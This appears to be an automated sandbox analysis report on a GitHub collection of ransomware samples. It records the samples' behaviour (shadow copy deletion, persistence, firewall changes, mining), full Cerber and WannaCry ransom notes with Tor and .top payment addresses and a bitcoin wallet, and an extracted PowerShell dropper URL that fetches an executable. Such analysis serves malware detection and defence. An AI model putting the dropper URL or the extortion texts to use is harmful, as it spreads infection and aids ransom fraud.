Overview

overview

10

Static

static

1

URLScan

urlscan

https://github.com/k...

windows10-1703-x64

10

Resubmissions

03-07-2024 22:48

240703-2rckhs1hrh 6

03-07-2024 20:15

240703-y1lm1awcqk 10

Analysis

  • max time kernel
    1200s
  • max time network
    1207s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
  • submitted
    03-07-2024 20:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://github.com/kh4sh3i/Ransomware-Samples

Score
10/10
cerberwannacrydefense_evasiondiscoveryevasionexecutionimpactminerpersistenceprivilege_escalationransomwareworm

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://french-cooking.com/myguy.exe

Extracted

Path

C:\Users\Admin\AppData\Roaming\Microsoft\OneNote\16.0\_R_E_A_D___T_H_I_S___K5YY_.hta

Family

cerber

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>C&#069;&#82;BE&#82; &#82;ANSOMWA&#82;&#069;: Instructi&#111;ns</title> <HTA:APPLICATION APPLICATIONNAME="i5N" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style type="text/css"> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 13pt; line-height: 19pt; } body, h1 { margin: 0; padding: 0; } hr { color: #bda; height: 2pt; margin: 1.5%; } h1 { color: #555; font-size: 14pt; } ol { padding-left: 2.5%; } ol li { padding-bottom: 13pt; } small { color: #555; font-size: 11pt; } ul { list-style-type: none; margin: 0; padding: 0; } .button { color: #04a; cursor: pointer; } .button:hover { text-decoration: underline; } .container { background-color: #fff; border: 2pt solid #c7c7c7; margin: 5%; min-width: 850px; padding: 2.5%; } .header { border-bottom: 2pt solid #c7c7c7; margin-bottom: 2.5%; padding-bottom: 2.5%; } .h { display: none; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .info { background-color: #efe; border: 2pt solid #bda; display: inline-block; padding: 1.5%; text-align: center; } .updating { color: red; display: none; padding-left: 35px; background: url("data:image/gif;base64,R0lGODlhGQAZAKIEAMzMzJmZmTMzM2ZmZgAAAAAAAAAAAAAAACH/C05FVFNDQVBFMi4wAwEAAAAh+QQFAAAEACwAAAAAGQAZAAADVki63P4wSEiZvLXemRf4yhYoQ0l9aMiVLISCDms+L/DIwwnfc+c3qZ9g6Hn5hkhF7YgUKI2dpvNpExJ/WKquSoMCvd9geDeuBpcuGFrcQWep5Df7jU0AACH5BAUAAAQALAoAAQAOABQAAAMwSLDU/iu+Gdl0FbTAqeXg5YCdSJCBuZVqKw5wC8/qHJv2IN+uKvytn9AnFBCHx0cCACH5BAUAAAQALAoABAAOABQAAAMzSLoEzrC5F9Wk9YK6Jv8gEYzgaH4myaVBqYbfIINyHdcDI+wKniu7YG+2CPI4RgFI+EkAACH5BAUAAAQALAQACgAUAA4AAAMzSLrcBNDJBeuUNd6WwXbWtwnkFZwMqUpnu6il06IKLChDrsxBGufAHW0C1IlwxeMieEkAACH5BAUAAAQALAEACgAUAA4AAAM0SLLU/lAtFquctk6aIe5gGA1kBpwPqVZn66hl1KINPDRB3sxAGufAHc0C1IkIxcARZ4QkAAAh+QQFAAAEACwBAAQADgAUAAADMUhK0vurSfiko8oKHC//yyCCYvmVI4cOZAq+UCCDcv3VM4cHCuDHOZ/wI/xxigDQMAEAIfkEBQAABAAsAQABAA4AFAAAAzNIuizOkLgZ13xraHVF1puEKWBYlUP1pWrLBLALz+0cq3Yg324PAUAXcNgaBlVGgPAISQAAIfkEBQAABAAsAQABABQADgAAAzRIujzOMBJHpaXPksAVHoogMlzpZWK6lF2UjgobSK9AtjSs7QTg8xCfELgQ/og9I1IxXCYAADs=") left no-repeat; } #change_language { float: right; } #change_language, #texts div { display: none; } </style> </head> <body> <div class="container"> <div class="header"> <a id="change_language" href="#" onclick="return changeLanguage1();" title="English">&#9745; English</a> <h1>C&#069;&#82;BE&#82; &#82;ANSOMWA&#82;&#069;</h1> <small id="title">Instructions</small> </div> <div id="languages"> <p>&#9745; Select your language</p> <ul> <li><a href="#" title="English" onclick="return sh_bl('en');">English</a></li> <li><a href="#" title="Arabic" onclick="return sh_bl('ar');">العربية</a></li> <li><a href="#" title="Chinese" onclick="return sh_bl('zh');">中文</a></li> <li><a href="#" title="Dutch" onclick="return sh_bl('nl');">Nederlands</a></li> <li><a href="#" title="French" onclick="return sh_bl('fr');">Français</a></li> <li><a href="#" title="German" onclick="return sh_bl('de');">Deutsch</a></li> <li><a href="#" title="Italian" onclick="return sh_bl('it');">Italiano</a></li> <li><a href="#" title="Japanese" onclick="return sh_bl('ja');">日本語</a></li> <li><a href="#" title="Korean" onclick="return sh_bl('ko');">한국어</a></li> <li><a href="#" title="Polish" onclick="return sh_bl('pl');">Polski</a></li> <li><a href="#" title="Portuguese" onclick="return sh_bl('pt');">Português</a></li> <li><a href="#" title="Spanish" onclick="return sh_bl('es');">Español</a></li> <li><a href="#" title="Turkish" onclick="return sh_bl('tr');">Türkçe</a></li> </ul> </div> <div id="texts"> <div id="en"> <p>Can't yo<span class="h">WI9pcE</span>u find the necessary files?<br>Is the c<span class="h">4zWPu5c</span>ontent of your files not readable?</p> <p>It is normal be<span class="h">BDuUL</span>cause the files' names and the data in your files have been encryp<span class="h">v6wgDP</span>ted by "Ce<span class="h">3CZVSaooIu</span>r&#98;er&nbsp;Rans&#111;mware".</p> <p>It me<span class="h">whllc0fdz</span>ans your files are NOT damage<span class="h">T9mQqgVUAW</span>d! Your files are modified only. This modification is reversible.<br>F<span class="h">JbOf</span>rom now it is not poss<span class="h">a5TwUWKhs</span>ible to use your files until they will be decrypted.</p> <p>The only way to dec<span class="h">EbaELc9KM</span>rypt your files safely is to &#98;uy the special decryption software "C<span class="h">HQ8OCoc</span>er&#98;er&nbsp;Decryptor".</p> <p>Any attempts to rest<span class="h">EOFSrgYioU</span>ore your files with the thir<span class="h">szx</span>d-party software will be fatal for your files!</p> <hr> <p class="w331208">You can proc<span class="h">H4fE3jBX</span>eed with purchasing of the decryption softw<span class="h">bQK5WzjXq</span>are at your personal page:</p> <p><span class="info"><span class="updating">Ple<span class="h">Bpa2OeR</span>ase wait...</span><a class="url" href="http://p27dokhpz2n7nvgr.12hygy.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.12hygy.top/0370-6B13-9551-0446-9B5C</a><hr><a href="http://p27dokhpz2n7nvgr.14ewqv.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.14ewqv.top/0370-6B13-9551-0446-9B5C</a><hr><a href="http://p27dokhpz2n7nvgr.14vvrc.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.14vvrc.top/0370-6B13-9551-0446-9B5C</a><hr><a href="http://p27dokhpz2n7nvgr.129p1t.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.129p1t.top/0370-6B13-9551-0446-9B5C</a><hr><a href="http://p27dokhpz2n7nvgr.1apgrn.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.1apgrn.top/0370-6B13-9551-0446-9B5C</a></span></p> <p>If t<span class="h">c7CSHSyC</span>his page cannot be opened &nbsp;<span class="button" onclick="return _url_upd_('en');">cli<span class="h">T6</span>ck here</span>&nbsp; to get a new addr<span class="h">EBXUkBG</span>ess of your personal page.<br><br>If the addre<span class="h">oPVHaLBv</span>ss of your personal page is the same as befo<span class="h">ED2z5Hzjz</span>re after you tried to get a new one,<br>you c<span class="h">apgm</span>an try to get a new address in one hour.</p> <p>At th<span class="h">vqo6zg7z8</span>is p&#097;ge you will receive the complete instr<span class="h">4QZFHXipM</span>uctions how to buy the decrypti<span class="h">XxzGYLk</span>on software for restoring all your files.</p> <p>Also at this p&#097;ge you will be able to res<span class="h">kDBVWUvTX7</span>tore any one file for free to be sure "Cer&#98;e<span class="h">CVTsNj3</span>r&nbsp;Decryptor" will help you.</p> <hr> <p>If your per<span class="h">hPfJMSlt</span>sonal page is not availa<span class="h">B5U7P</span>ble for a long period there is another way to open your personal page - insta<span class="h">cbeHPiMzKQ</span>llation and use of Tor&nbsp;Browser:</p> <ol> <li>run your Inte<span class="h">LJ</span>rnet browser (if you do not know wh&#097;t it is run the Internet&nbsp;Explorer);</li> <li>ent<span class="h">F1</span>er or copy the &#097;ddress <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/downlo&#097;d/download-easy.html.en</a> into the address bar of your browser &#097;nd press ENTER;</li> <li>wait for the site load<span class="h">CCbcva1d</span>ing;</li> <li>on the site you will be offered to do<span class="h">U0</span>wnload Tor&nbsp;Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li> <li>ru<span class="h">qTT3MC2</span>n Tor&nbsp;Browser;</li> <li>connect with the butt<span class="h">txSygS</span>on "Connect" (if you use the English version);</li> <li>a normal Internet bro<span class="h">K9</span>wser window will be opened &#097;fter the initialization;</li> <li>type or copy the add<span class="h">Es</span>ress <br><span class="info">http://p27dokhpz2n7nvgr.onion/0370-6B13-9551-0446-9B5C</span><br> in this browser address bar;</li> <li>pre<span class="h">UjVlu</span>ss ENTER;</li> <li>the site sho<span class="h">RtHJ3e</span>uld be loaded; if for some reason the site is not lo<span class="h">ju</span>ading wait for a moment and try again.</li> </ol> <p>If you have any pr<span class="h">q3HJRJ1nq</span>oblems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc<span class="h">11NbsaoeZn</span>h bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> <hr> <p><strong>Addit<span class="h">UmbwbuTEMX</span>ional information:</strong></p> <p>You will fi<span class="h">V8cziUDsQ</span>nd the instru<span class="h">KmRvSmRW</span>cti&#111;ns ("*_READ_THIS_FILE_*.hta") for re<span class="h">n8d4</span>st&#111;ring y&#111;ur files in &#097;ny f<span class="h">ZMQ</span>&#111;lder with your enc<span class="h">4bJn</span>rypted files.</p> <p>The instr<span class="h">EgllK</span>ucti&#111;ns "*_READ_THIS_FILE_*.hta" in the f<span class="h">NI</span>&#111;lder<span class="h">V43XslNCz</span>s with your encry<span class="h">AbNik</span>pted files are not vir<span class="h">oPwbR</span>uses! The instruc<span class="h">OJZywt4</span>tions "*_READ_THIS_FILE_*.hta" will he<span class="h">3</span>lp you to dec<span class="h">W3ccE9VJ6</span>rypt your files.</p> <p>Remembe<span class="h">cy3</span>r! The w&#111;rst si<span class="h">kKijjM9Ozi</span>tu&#097;tion already happ<span class="h">Y0RR8pik</span>ened and n&#111;w the future of your files de<span class="h">I</span>pends on your determ<span class="h">ri86fTxnn</span>ination and speed of your actions.</p> </div> <div id="ar" style="direction: rtl;"> <p>لا يمكنك العثور على الملفات الضرورية؟<br>هل محتوى الملفات غير قابل للقراءة؟</p> <p>هذا أمر طبيعي لأن أسماء الملفات والبيانات في الملفات قد تم تشفيرها بواسطة "Cer&#98;er&nbsp;Rans&#111;mware".</p> <p>وهذا يعني أن الملفات الخاصة بك ليست تالفة! فقد تم تعديل ملفاتك فقط. ويمكن التراجع عن هذا.<br>ومن الآن فإنه لا يكن استخدام الملفات الخاصة بك حتى يتم فك تشفيرها.</p> <p>الطريقة الوحيدة لفك تشفير ملفاتك بأمان هو أن تشتري برنامج فك التشفير المتخصص "Cer&#98;er&nbsp;Decryptor".</p> <p>إن أية محاولات لاستعادة الملفات الخاصة بك بواسطة برامج من طرف ثالث سوف تكون مدمرة لملفاتك!</p> <hr> <p>يمكنك الشروع في شراء برنامج فك التشفير من صفحتك الشخصية:</p> <p><span class="info"><span class="updating">أرجو الإنتظار...</span><a class="url" href="http://p27dokhpz2n7nvgr.12hygy.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.12hygy.top/0370-6B13-9551-0446-9B5C</a><hr><a href="http://p27dokhpz2n7nvgr.14ewqv.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.14ewqv.top/0370-6B13-9551-0446-9B5C</a><hr><a href="http://p27dokhpz2n7nvgr.14vvrc.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.14vvrc.top/0370-6B13-9551-0446-9B5C</a><hr><a href="http://p27dokhpz2n7nvgr.129p1t.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.129p1t.top/0370-6B13-9551-0446-9B5C</a><hr><a href="http://p27dokhpz2n7nvgr.1apgrn.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.1apgrn.top/0370-6B13-9551-0446-9B5C</a></span></p> <p>في حالة تعذر فتح هذه الصفحة &nbsp;<span class="button" onclick="return _url_upd_('ar');">انقر هنا</span>&nbsp; لإنشاء عنوان جديد لصفحتك الشخصية.</p> <p>في هذه الصفحة سوف تتلقى تعليمات كاملة حول كيفية شراء برنامج فك التشفير لاستعادة جميع الملفات الخاصة بك.</p> <p>في هذه الصفحة أيضًا سوف تتمكن من استعادة ملف واحد بشكل مجاني للتأكد من أن "Cer&#98;er&nbsp;Decryptor" سوف يساعدك.</p> <hr> <p>إذا كانت صفحتك الشخصية غير متاحة لفترة طويلة فإن ثمّة طريقة أخرى لفتح صفحتك الشخصية - تحميل واستخدام متصفح Tor:</p> <ol> <li>قم بتشغيل متصفح الإنترنت الخاص بك (إذا كنت لا تعرف ما هو قم بتشغيل إنترنت إكسبلورر);</li> <li>قم بكتابة أو نسخ العنوان <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> إلى شريط العنوان في المستعرض الخاص بك ثم اضغط ENTER;</li> <li>انتظر لتحميل الموقع;</li> <li>سوف يعرض عليك الموقع تحميل متصفح Tor. قم بتحميله وتشغيله، واتبع تعليمات التثبيت، وانتظر حتى اكتمال التثبيت;</li> <li>قم بتشغيل متصفح Tor;</li> <li>اضغط على الزر "Connect" (إذا كنت تستخدم النسخة الإنجليزية);</li> <li>سوف تُفتح نافذة متصفح الإنترنت العادي بعد البدء;</li> <li>قم بكتابة أو نسخ العنوان <br><span class="info">http://p27dokhpz2n7nvgr.onion/0370-6B13-9551-0446-9B5C</span><br> في شريط العنوان في المتصفح;</li> <li>اضغط ENTER;</li> <li>يجب أن يتم تحميل الموقع؛ إذا لم يتم تحميل الموقع لأي سبب، انتظر للحظة وحاول مرة أخرى.</li> </ol> <p>إذا كان لديك أية مشكلات أثناء عملية التثبيت أو استخدام متصفح Tor، يُرجى زيارة <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> واكتب الطلب "install tor browser windows" أو "تثبيت نوافذ متصفح Tor" في شريط البحث، وسوف تجد الكثير من أشرطة الفيديو للتدريب حول تثبيت متصفح Tor واستخدامه.</p> <hr> <p><strong>معلومات إض<span class="h">4AH3xq</span>افية:</strong></p> <p>س<span class="h">bo</span>وف تجد إرشادات استعادة الملفات الخاصة بك ("*_READ_THIS_FILE_*") في أي مجلد مع ملفاتك المشفرة.</p> <p>الإرش<span class="h">g</span>ادات ("*_READ_THIS_FILE_*") الموجودة في المجلدات مع ملفاتك المشفرة ليست فيروسات والإرشادات ("*_READ_THIS_FILE_*") سوف تساعدك على فك تشفير الملفات الخاصة بك.</p> <p>تذكر أن أسوأ مو<span class="h">Nlt8noH</span>قف قد حدث بالفعل، والآن مستقبل ملفاتك يعتمد على عزيمتك وسرعة الإجراءات الخاصة بك.</p> </div> <div id="zh"> <p>您找不到所需的文件?<br>您文件的内容无法阅读?</p> <p>这是正常的,因为您文件的文件名和数据已经被“Cer&#98;er&nbsp;Rans&#111;mware”加密了。</p> <p>这意味着您的文件并�

Extracted

Path

C:\Users\Admin\AppData\Roaming\Microsoft\OneNote\16.0\_R_E_A_D___T_H_I_S___NEI2NG_.txt

Family

cerber

Ransom Note
CERBER RANSOMWARE ----- YOUR DOCUMENTS, PH0TOS, DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ----- The only way to decrypt y0ur files is to receive the private key and decryption program. To receive the private key and decryption program go to any decrypted folder, inside there is the special file (*_READ_THIS_FILE_*) with complete instructions how to decrypt your files. If you cannot find any (*_READ_THIS_FILE_*) file at your PC, follow the instructions below: ----- 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://p27dokhpz2n7nvgr.onion/0370-6B13-9551-0446-9B5C Note! This page is available via "Tor Browser" only. ----- Also you can use temporary addresses on your personal page without using "Tor Browser". ----- 1. http://p27dokhpz2n7nvgr.12hygy.top/0370-6B13-9551-0446-9B5C 2. http://p27dokhpz2n7nvgr.14ewqv.top/0370-6B13-9551-0446-9B5C 3. http://p27dokhpz2n7nvgr.14vvrc.top/0370-6B13-9551-0446-9B5C 4. http://p27dokhpz2n7nvgr.129p1t.top/0370-6B13-9551-0446-9B5C 5. http://p27dokhpz2n7nvgr.1apgrn.top/0370-6B13-9551-0446-9B5C ----- Note! These are temporary addresses! They will be available for a limited amount of time! -----
URLs

http://p27dokhpz2n7nvgr.onion/0370-6B13-9551-0446-9B5C

http://p27dokhpz2n7nvgr.12hygy.top/0370-6B13-9551-0446-9B5C

http://p27dokhpz2n7nvgr.14ewqv.top/0370-6B13-9551-0446-9B5C

http://p27dokhpz2n7nvgr.14vvrc.top/0370-6B13-9551-0446-9B5C

http://p27dokhpz2n7nvgr.129p1t.top/0370-6B13-9551-0446-9B5C

http://p27dokhpz2n7nvgr.1apgrn.top/0370-6B13-9551-0446-9B5C

Extracted

Path

C:\Users\Admin\Documents\_R_E_A_D___T_H_I_S___6R04X67Z_.txt

Family

cerber

Ransom Note
CERBER RANSOMWARE ----- YOUR DOCUMENTS, PH0TOS, DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ----- The only way to decrypt y0ur files is to receive the private key and decryption program. To receive the private key and decryption program go to any decrypted folder, inside there is the specia���콪N5�&�])%�g䧴e�K ,��nu�d�4�G<Ķm�Q����nNx�R*WI��n�q����������Vq���΀�on������c�9Uc����k�8J`'��֣�?���̧�UO`&-��:���?�\YE/�cA+�ދL�MfLX}��7x�~���lQ&�̅�K��m�edy�Vt~㣙~fe�� k�Xp4ӂ�F�ze�>:{��w��l��஀Y( W����q2!BLGP?�O~��B���r�L���ս�Iagl���oR����"�����h�iԘ��00[l:�xXC.�:��өG�4g�}>̎1�gM�폝�0#&� }a���H�D ��`���|]Ѯ'��ಉo}�d��h���\�)��� ��B�Za?�O��T����+��-ߊg�ī*� ?�BZM™(�r�5y����g��[��P��*�5ޔ��� 3 ���?�����Dω�D�R!C�H��{i����y�J�Z�,���㪷�}J�iҳ_�Q/�P�� �2f,�� I�����������KQ9��O��F��2d�4�,�o �S�F�����Y2o�n?��>�J~�o���}��:t-��HK�a��%�} �^� `�,mji����fD�"�?�E^�te�7�ނc����C�*s`g�Q\�I2��?HȽR�7��C�؜՝D.Ɵj���5Q�dd�0�H����G;��ߐv�z��n�h�' � ����#�����s��$�@�,,0`����2ɚb�7t�̪�7����'��c��2L>�#���=g��l�rf\�t�,�I�=/���M�vuSW��G%-�q�ñ�N�������=�����z�E�����~U�fA?��'�U�2��0�S�{H�����=N5�4�?�=���Ի>ݛŒ��ʙ}�D-����Zx�����?A�_��G13�x4�`�=ֱSZ;l��"���v�e��I���M7��p����p#V%Ê��-�XS5

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Signatures

  • Cerber

    Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

    ransomwarecerber
  • Wannacry

    WannaCry is a ransomware cryptoworm.

    ransomwarewormwannacry
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Contacts a large (1157) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Cryptocurrency Miner

    Makes network request to known mining pool URL.

    miner
  • Drops startup file 5 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 9 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Uses the VBS compiler for execution 1 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Drops desktop.ini file(s) 2 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
    defense_evasion
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 38 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 3 IoCs
    ransomware
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 20 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 48 IoCs
  • Suspicious use of SetWindowsHookEx 50 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/kh4sh3i/Ransomware-Samples
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4604
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffcb8cb9758,0x7ffcb8cb9768,0x7ffcb8cb9778
      2⤵
        PID:4728
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1676 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:2
        2⤵
          PID:4048
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
          2⤵
            PID:896
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2044 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
            2⤵
              PID:1880
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2856 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
              2⤵
                PID:4624
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2872 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
                2⤵
                  PID:2224
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
                  2⤵
                    PID:3512
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
                    2⤵
                      PID:4536
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5720 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
                      2⤵
                        PID:2544
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
                        2⤵
                          PID:5032
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4824 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
                          2⤵
                            PID:2768
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5920 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
                            2⤵
                              PID:2824
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
